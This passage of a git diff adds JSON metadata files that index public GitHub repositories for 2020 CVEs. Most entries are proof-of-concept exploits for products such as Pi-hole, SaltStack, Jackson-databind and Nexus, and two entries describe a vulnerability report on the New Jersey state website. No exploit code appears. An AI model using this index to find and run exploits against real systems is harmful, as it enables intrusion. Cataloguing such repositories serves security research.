"https:\/\/github.com\/DanielRuf\/snyk-js-jquery-565129", + "description": "patches for SNYK-JS-JQUERY-565129, SNYK-JS-JQUERY-567880, CVE-2020-1102, CVE-2020-11023, includes the patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428", + "fork": false, + "created_at": "2020-04-14T19:12:01Z", + "updated_at": "2024-10-05T19:47:38Z", + "pushed_at": "2022-08-22T12:00:56Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-11358", + "cve-2019-5428", + "cve-2020-11022", + "cve-2020-11023", + "jquery", + "patch", + "snyk", + "snyk-js-jquery-174006", + "snyk-js-jquery-565129", + "snyk-js-jquery-567880" + ], + "visibility": "public", + "forks": 10, + "watchers": 26, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11022.json b/2020/CVE-2020-11022.json new file mode 100644 index 0000000000..3b0bbe8226 --- /dev/null +++ b/2020/CVE-2020-11022.json @@ -0,0 +1,64 @@ +[ + { + "id": 417679926, + "name": "CVE-2020-11022-CVE-2020-11023", + "full_name": "0xAJ2K\/CVE-2020-11022-CVE-2020-11023", + "owner": { + "login": "0xAJ2K", + "id": 48768952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48768952?v=4", + "html_url": "https:\/\/github.com\/0xAJ2K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAJ2K\/CVE-2020-11022-CVE-2020-11023", + "description": "Little thing put together quickly to demonstrate this CVE ", + "fork": false, + "created_at": "2021-10-16T01:10:33Z", + "updated_at": "2024-11-12T00:13:48Z", + "pushed_at": "2022-09-11T22:06:40Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 495361196, + "name": "https-nj.gov---CVE-2020-11022", + "full_name": "Snorlyd\/https-nj.gov---CVE-2020-11022", + "owner": { + "login": "Snorlyd", + "id": 93614879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93614879?v=4", + "html_url": "https:\/\/github.com\/Snorlyd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Snorlyd\/https-nj.gov---CVE-2020-11022", + "description": "Vulnearability Report of the New Jersey official site", + "fork": false, + "created_at": "2022-05-23T10:26:10Z", + "updated_at": "2022-05-23T12:12:59Z", + "pushed_at": "2022-05-23T11:06:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11023.json b/2020/CVE-2020-11023.json new file mode 100644 index 0000000000..e2da309bfc --- /dev/null +++ b/2020/CVE-2020-11023.json @@ -0,0 +1,95 @@ +[ + { + "id": 495368631, + "name": "https-nj.gov---CVE-2020-11023", + "full_name": "Snorlyd\/https-nj.gov---CVE-2020-11023", + "owner": { + "login": "Snorlyd", + "id": 93614879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93614879?v=4", + "html_url": "https:\/\/github.com\/Snorlyd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Snorlyd\/https-nj.gov---CVE-2020-11023", + "description": "Vulnearability Report of the New Jersey official site", + "fork": false, + "created_at": "2022-05-23T10:49:19Z", + "updated_at": "2024-03-22T11:34:10Z", + "pushed_at": "2022-05-23T11:06:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738344836, + "name": "CVE-2020-11023", + "full_name": "Cybernegro\/CVE-2020-11023", + "owner": { + "login": "Cybernegro", + "id": 155039366, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155039366?v=4", + "html_url": "https:\/\/github.com\/Cybernegro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cybernegro\/CVE-2020-11023", + "description": "CVE-2020-11023 PoC for bug bounty.", + "fork": false, + "created_at": "2024-01-03T02:35:37Z", + "updated_at": "2024-06-05T16:58:15Z", + "pushed_at": "2024-01-03T02:40:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786060686, + "name": "cve-2020-11023-demonstration", + "full_name": "andreassundstrom\/cve-2020-11023-demonstration", + "owner": { + "login": "andreassundstrom", + "id": 22585545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22585545?v=4", + "html_url": "https:\/\/github.com\/andreassundstrom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andreassundstrom\/cve-2020-11023-demonstration", + "description": "Demonstration of CVE-2020-11023", + "fork": false, + "created_at": "2024-04-13T09:57:53Z", + "updated_at": "2024-04-13T09:58:10Z", + "pushed_at": "2024-04-13T15:17:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11060.json b/2020/CVE-2020-11060.json new file mode 100644 index 0000000000..9522d1e1ff --- /dev/null +++ b/2020/CVE-2020-11060.json @@ -0,0 +1,33 @@ +[ + { + "id": 376057593, + "name": "cve-2020-11060-poc", + "full_name": "0xdreadnaught\/cve-2020-11060-poc", + "owner": { + "login": "0xdreadnaught", + "id": 983663, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/983663?v=4", + "html_url": "https:\/\/github.com\/0xdreadnaught", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xdreadnaught\/cve-2020-11060-poc", + "description": "Python3 POC for CVE 2020-11060", + "fork": false, + "created_at": "2021-06-11T14:52:03Z", + "updated_at": "2024-10-26T01:47:24Z", + "pushed_at": "2023-08-31T14:05:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11076.json b/2020/CVE-2020-11076.json new file mode 100644 index 0000000000..ccc87e5455 --- /dev/null +++ b/2020/CVE-2020-11076.json @@ -0,0 +1,33 @@ +[ + { + "id": 265824943, + "name": "cougar", + "full_name": "dentarg\/cougar", + "owner": { + "login": "dentarg", + "id": 42626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42626?v=4", + "html_url": "https:\/\/github.com\/dentarg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dentarg\/cougar", + "description": "Puma, CVE-2020-11076 and CVE-2020-11077", + "fork": false, + "created_at": "2020-05-21T10:55:22Z", + "updated_at": "2020-05-23T17:55:15Z", + "pushed_at": "2020-05-21T10:59:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11107.json b/2020/CVE-2020-11107.json new file mode 100644 index 0000000000..adf1bb04c8 --- /dev/null +++ b/2020/CVE-2020-11107.json @@ -0,0 +1,67 @@ +[ + { + "id": 252745395, + "name": "CVE-2020-11107", + "full_name": "S1lkys\/CVE-2020-11107", + "owner": { + "login": "S1lkys", + "id": 40408435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40408435?v=4", + "html_url": "https:\/\/github.com\/S1lkys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S1lkys\/CVE-2020-11107", + "description": "This is a writeup for CVE-2020-11107 reported by Maximilian Barz", + "fork": false, + "created_at": "2020-04-03T13:46:25Z", + "updated_at": "2024-08-12T19:59:39Z", + "pushed_at": "2020-04-03T14:04:36Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-11107" + ], + "visibility": "public", + "forks": 9, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 253211474, + "name": "CVE-2020-11107", + "full_name": "andripwn\/CVE-2020-11107", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/CVE-2020-11107", + "description": "XAMPP - CVE-2020-11107", + "fork": false, + "created_at": "2020-04-05T10:45:49Z", + "updated_at": "2024-08-12T19:59:45Z", + "pushed_at": "2020-04-05T10:46:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11108.json b/2020/CVE-2020-11108.json new file mode 100644 index 0000000000..a0644de2fc --- /dev/null +++ b/2020/CVE-2020-11108.json @@ -0,0 +1,33 @@ +[ + { + "id": 252876143, + "name": "CVE-2020-11108-PoC", + "full_name": "Frichetten\/CVE-2020-11108-PoC", + "owner": { + "login": "Frichetten", + "id": 10386884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10386884?v=4", + "html_url": "https:\/\/github.com\/Frichetten", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Frichetten\/CVE-2020-11108-PoC", + "description": "PoCs for CVE-2020-11108; an RCE and priv esc in Pi-hole", + "fork": false, + "created_at": "2020-04-04T00:50:42Z", + "updated_at": "2024-10-20T23:22:59Z", + "pushed_at": "2020-05-10T22:35:46Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11110.json b/2020/CVE-2020-11110.json new file mode 100644 index 0000000000..d994782e55 --- /dev/null +++ b/2020/CVE-2020-11110.json @@ -0,0 +1,33 @@ +[ + { + "id": 739326545, + "name": "CVE-2020-11110-Proof-of-Concept", + "full_name": "AVE-Stoik\/CVE-2020-11110-Proof-of-Concept", + "owner": { + "login": "AVE-Stoik", + "id": 127731526, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127731526?v=4", + "html_url": "https:\/\/github.com\/AVE-Stoik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AVE-Stoik\/CVE-2020-11110-Proof-of-Concept", + "description": "Proof of concept for CVE-2020-11110, for educational purpose only", + "fork": false, + "created_at": "2024-01-05T09:51:21Z", + "updated_at": "2024-01-07T17:49:28Z", + "pushed_at": "2024-01-05T09:54:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11113.json b/2020/CVE-2020-11113.json new file mode 100644 index 0000000000..fb3ff5c1b7 --- /dev/null +++ b/2020/CVE-2020-11113.json @@ -0,0 +1,37 @@ +[ + { + "id": 265863043, + "name": "CVE-2020-11113", + "full_name": "Al1ex\/CVE-2020-11113", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-11113", + "description": "CVE-2020-11113:Jackson-databind RCE", + "fork": false, + "created_at": "2020-05-21T14:00:33Z", + "updated_at": "2024-08-12T20:01:43Z", + "pushed_at": "2022-11-16T08:58:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-11113", + "jackson-databind", + "rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11179.json b/2020/CVE-2020-11179.json new file mode 100644 index 0000000000..8ce23c5cd5 --- /dev/null +++ b/2020/CVE-2020-11179.json @@ -0,0 +1,33 @@ +[ + { + "id": 879468306, + "name": "CVE-2020-11179-Adreno-Qualcomm-GPU", + "full_name": "sparrow-labz\/CVE-2020-11179-Adreno-Qualcomm-GPU", + "owner": { + "login": "sparrow-labz", + "id": 27852896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27852896?v=4", + "html_url": "https:\/\/github.com\/sparrow-labz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sparrow-labz\/CVE-2020-11179-Adreno-Qualcomm-GPU", + "description": "Productization efforts of CVE-2020-11179 Adreno-Qualcomm-GPU bug, original poc by Ben Hawkes of P0", + "fork": false, + "created_at": "2024-10-28T00:50:57Z", + "updated_at": "2024-11-20T03:46:13Z", + "pushed_at": "2024-11-09T23:57:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11444.json b/2020/CVE-2020-11444.json new file mode 100644 index 0000000000..77c976f194 --- /dev/null +++ b/2020/CVE-2020-11444.json @@ -0,0 +1,64 @@ +[ + { + "id": 267245753, + "name": "CVE-2020-11444", + "full_name": "zhzyker\/CVE-2020-11444", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/CVE-2020-11444", + "description": "Nexus 3 越权漏洞利用脚本", + "fork": false, + "created_at": "2020-05-27T07:03:59Z", + "updated_at": "2024-08-12T20:01:57Z", + "pushed_at": "2020-05-27T07:09:32Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 702912102, + "name": "Nexus-Repository-Manager-3-CVE-2020-11444-", + "full_name": "CN016\/Nexus-Repository-Manager-3-CVE-2020-11444-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/Nexus-Repository-Manager-3-CVE-2020-11444-", + "description": "Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-11444)", + "fork": false, + "created_at": "2023-10-10T08:43:41Z", + "updated_at": "2023-10-10T08:44:39Z", + "pushed_at": "2023-10-10T08:44:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11492.json b/2020/CVE-2020-11492.json new file mode 100644 index 0000000000..cdfcb3fbbf --- /dev/null +++ b/2020/CVE-2020-11492.json @@ -0,0 +1,33 @@ +[ + { + "id": 267493495, + "name": "CVE-2020-11492", + "full_name": "CrackerCat\/CVE-2020-11492", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2020-11492", + "description": null, + "fork": false, + "created_at": "2020-05-28T04:32:01Z", + "updated_at": "2022-11-09T18:07:55Z", + "pushed_at": "2020-05-27T21:22:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11493.json b/2020/CVE-2020-11493.json new file mode 100644 index 0000000000..c91bbafb0a --- /dev/null +++ b/2020/CVE-2020-11493.json @@ -0,0 +1,33 @@ +[ + { + "id": 271946441, + "name": "CVE-2020-11493", + "full_name": "fengjixuchui\/CVE-2020-11493", + "owner": { + "login": "fengjixuchui", + "id": 2487206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2020-11493", + "description": null, + "fork": false, + "created_at": "2020-06-13T05:26:11Z", + "updated_at": "2023-01-04T03:03:54Z", + "pushed_at": "2020-06-01T15:58:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11519.json b/2020/CVE-2020-11519.json new file mode 100644 index 0000000000..90ff6238ea --- /dev/null +++ b/2020/CVE-2020-11519.json @@ -0,0 +1,40 @@ +[ + { + "id": 276226715, + "name": "winmagic_sd", + "full_name": "patois\/winmagic_sd", + "owner": { + "login": "patois", + "id": 2330989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2330989?v=4", + "html_url": "https:\/\/github.com\/patois", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patois\/winmagic_sd", + "description": "Technical Write-Up on and PoC Exploit for CVE-2020-11519 and CVE-2020-11520", + "fork": false, + "created_at": "2020-06-30T23:01:33Z", + "updated_at": "2024-08-12T20:03:14Z", + "pushed_at": "2022-10-23T09:28:38Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2020-11519", + "cve-2020-11520", + "exploit", + "proof-of-concept", + "writeup" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11539.json b/2020/CVE-2020-11539.json new file mode 100644 index 0000000000..d757bbdf38 --- /dev/null +++ b/2020/CVE-2020-11539.json @@ -0,0 +1,33 @@ +[ + { + "id": 238443420, + "name": "CVE-2020-11539", + "full_name": "the-girl-who-lived\/CVE-2020-11539", + "owner": { + "login": "the-girl-who-lived", + "id": 42164898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42164898?v=4", + "html_url": "https:\/\/github.com\/the-girl-who-lived", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/the-girl-who-lived\/CVE-2020-11539", + "description": "Improper Access Control in Tata Sonata Smartband", + "fork": false, + "created_at": "2020-02-05T12:19:19Z", + "updated_at": "2024-08-12T19:57:23Z", + "pushed_at": "2020-04-22T11:00:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11546.json b/2020/CVE-2020-11546.json new file mode 100644 index 0000000000..01a11916f5 --- /dev/null +++ b/2020/CVE-2020-11546.json @@ -0,0 +1,64 @@ +[ + { + "id": 442180337, + "name": "CVE-2020-11546", + "full_name": "Official-BlackHat13\/CVE-2020-11546", + "owner": { + "login": "Official-BlackHat13", + "id": 58517369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58517369?v=4", + "html_url": "https:\/\/github.com\/Official-BlackHat13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Official-BlackHat13\/CVE-2020-11546", + "description": "SuperWebMailer RCE", + "fork": false, + "created_at": "2021-12-27T14:18:31Z", + "updated_at": "2021-12-27T14:41:14Z", + "pushed_at": "2021-12-27T14:41:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442686412, + "name": "CVE-2020-11546", + "full_name": "damit5\/CVE-2020-11546", + "owner": { + "login": "damit5", + "id": 32387710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32387710?v=4", + "html_url": "https:\/\/github.com\/damit5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/damit5\/CVE-2020-11546", + "description": "基于GO的exp和poc", + "fork": false, + "created_at": "2021-12-29T06:51:36Z", + "updated_at": "2023-03-06T08:37:00Z", + "pushed_at": "2021-12-29T07:25:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11547.json b/2020/CVE-2020-11547.json new file mode 100644 index 0000000000..0cc14ec41e --- /dev/null +++ b/2020/CVE-2020-11547.json @@ -0,0 +1,33 @@ +[ + { + "id": 250392759, + "name": "CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure", + "full_name": "ch-rigu\/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure", + "owner": { + "login": "ch-rigu", + "id": 40671439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40671439?v=4", + "html_url": "https:\/\/github.com\/ch-rigu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ch-rigu\/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure", + "description": null, + "fork": false, + "created_at": "2020-03-26T23:14:55Z", + "updated_at": "2024-11-06T01:47:10Z", + "pushed_at": "2020-10-20T21:00:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11579.json b/2020/CVE-2020-11579.json new file mode 100644 index 0000000000..753a2c6c49 --- /dev/null +++ b/2020/CVE-2020-11579.json @@ -0,0 +1,33 @@ +[ + { + "id": 265251143, + "name": "CVE-2020-11579", + "full_name": "ShielderSec\/CVE-2020-11579", + "owner": { + "login": "ShielderSec", + "id": 24564748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24564748?v=4", + "html_url": "https:\/\/github.com\/ShielderSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShielderSec\/CVE-2020-11579", + "description": "Exploit code for CVE-2020-11579, an arbitrary file disclosure through the MySQL client in PHPKB", + "fork": false, + "created_at": "2020-05-19T13:12:48Z", + "updated_at": "2024-08-12T20:01:39Z", + "pushed_at": "2024-02-06T11:26:06Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 22, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11650.json b/2020/CVE-2020-11650.json new file mode 100644 index 0000000000..8568f2b4fe --- /dev/null +++ b/2020/CVE-2020-11650.json @@ -0,0 +1,33 @@ +[ + { + "id": 254288356, + "name": "CVE-2020-11650", + "full_name": "weinull\/CVE-2020-11650", + "owner": { + "login": "weinull", + "id": 16414933, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16414933?v=4", + "html_url": "https:\/\/github.com\/weinull", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/weinull\/CVE-2020-11650", + "description": null, + "fork": false, + "created_at": "2020-04-09T06:21:35Z", + "updated_at": "2024-08-12T19:59:56Z", + "pushed_at": "2020-04-13T00:59:41Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11651.json b/2020/CVE-2020-11651.json new file mode 100644 index 0000000000..2d08726806 --- /dev/null +++ b/2020/CVE-2020-11651.json @@ -0,0 +1,387 @@ +[ + { + "id": 260370661, + "name": "salt-vulnerabilities", + "full_name": "chef-cft\/salt-vulnerabilities", + "owner": { + "login": "chef-cft", + "id": 13543320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13543320?v=4", + "html_url": "https:\/\/github.com\/chef-cft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chef-cft\/salt-vulnerabilities", + "description": "Checks for CVE-2020-11651 and CVE-2020-11652", + "fork": false, + "created_at": "2020-05-01T03:23:01Z", + "updated_at": "2024-08-12T20:00:56Z", + "pushed_at": "2021-08-24T12:55:23Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 260556433, + "name": "salt-security-backports", + "full_name": "rossengeorgiev\/salt-security-backports", + "owner": { + "login": "rossengeorgiev", + "id": 2720787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2720787?v=4", + "html_url": "https:\/\/github.com\/rossengeorgiev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rossengeorgiev\/salt-security-backports", + "description": "Salt security backports for CVE-2020-11651 & CVE-2020-11652", + "fork": false, + "created_at": "2020-05-01T20:53:49Z", + "updated_at": "2024-08-12T20:00:58Z", + "pushed_at": "2020-05-18T17:36:18Z", + "stargazers_count": 108, + "watchers_count": 108, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-11651", + "cve-2020-11652", + "salt", + "saltstack" + ], + "visibility": "public", + "forks": 17, + "watchers": 108, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 261113794, + "name": "cve-2020-11651", + "full_name": "dozernz\/cve-2020-11651", + "owner": { + "login": "dozernz", + "id": 6723850, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6723850?v=4", + "html_url": "https:\/\/github.com\/dozernz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dozernz\/cve-2020-11651", + "description": null, + "fork": false, + "created_at": "2020-05-04T08:01:37Z", + "updated_at": "2024-11-18T19:07:46Z", + "pushed_at": "2020-05-04T08:11:21Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 103, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 261160783, + "name": "CVE-2020-11651", + "full_name": "0xc0d\/CVE-2020-11651", + "owner": { + "login": "0xc0d", + "id": 33804388, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33804388?v=4", + "html_url": "https:\/\/github.com\/0xc0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xc0d\/CVE-2020-11651", + "description": "CVE-2020-11651: Proof of Concept", + "fork": false, + "created_at": "2020-05-04T11:47:56Z", + "updated_at": "2024-08-12T20:01:05Z", + "pushed_at": "2021-07-07T21:17:01Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-11651", + "cve-2020-11652", + "poc", + "saltstack", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 40, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 261161731, + "name": "CVE-2020-11651-poc", + "full_name": "jasperla\/CVE-2020-11651-poc", + "owner": { 